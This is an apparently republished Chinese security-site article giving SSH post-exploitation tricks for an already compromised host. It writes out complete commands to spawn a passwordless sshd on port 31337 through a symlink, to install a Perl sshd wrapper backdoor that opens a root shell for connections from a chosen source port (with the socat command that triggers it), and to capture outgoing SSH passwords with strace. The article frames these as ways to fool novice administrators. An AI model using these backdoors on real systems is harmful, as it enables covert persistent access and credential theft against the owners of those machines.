移动安全 安全管理 应用案例 网络威胁系统安全 应用安全 数据安全 云安全
当前位置: 主页 > 信息安全 > 系统安全 >

渗 透 技 巧 之 S S H 篇

时间:2014-06-12 16:36来源:TuZhiJiaMi企业信息安全专家 点击:
用些小技巧,蒙蒙菜鸟管理员。 1. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口 肉鸡上执行 mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337; 就会派生一个31337端口
Tags系统安全(735)SSH(4)渗透技巧(1)  

  用些小技巧,蒙蒙菜鸟管理员。

  1. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口

  肉鸡上执行

  mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;

  就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。

  效果图:

渗透技巧之SSH篇

  2. 做一个SSH wrapper后门,效果比第一个好,没有开放额外的端口,只要对方开了SSH服务,就能远程连接

  在肉鸡上执行:

  [root@localhost ~]# cd /usr/sbin[root@localhost sbin]# mv sshd ../bin[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd[root@localhost sbin]# chmod u+x sshd[root@localhost sbin]# /etc/init.d/sshd restart

  在本机执行:

  socat STDIO TCP4:10.18.180.20:22,sourceport=13377

  如果你想修改源端口,可以用python的struct标准库实现

  >>> import struct>>> buffer = struct.pack('>I6',19526)>>> print repr(buffer)'\x00\x00LF'>>> buffer = struct.pack('>I6',13377)>>> print buffer4A

  效果图如下:

渗透技巧之SSH篇

  3. 记录SSH客户端连接密码

  搞定主机后,往往想记录肉鸡SSH连接到其他主机的密码,进一步扩大战果,使用strace命令就行了。

  效果图:

渗透技巧之SSH篇

------分隔线----------------------------

推荐内容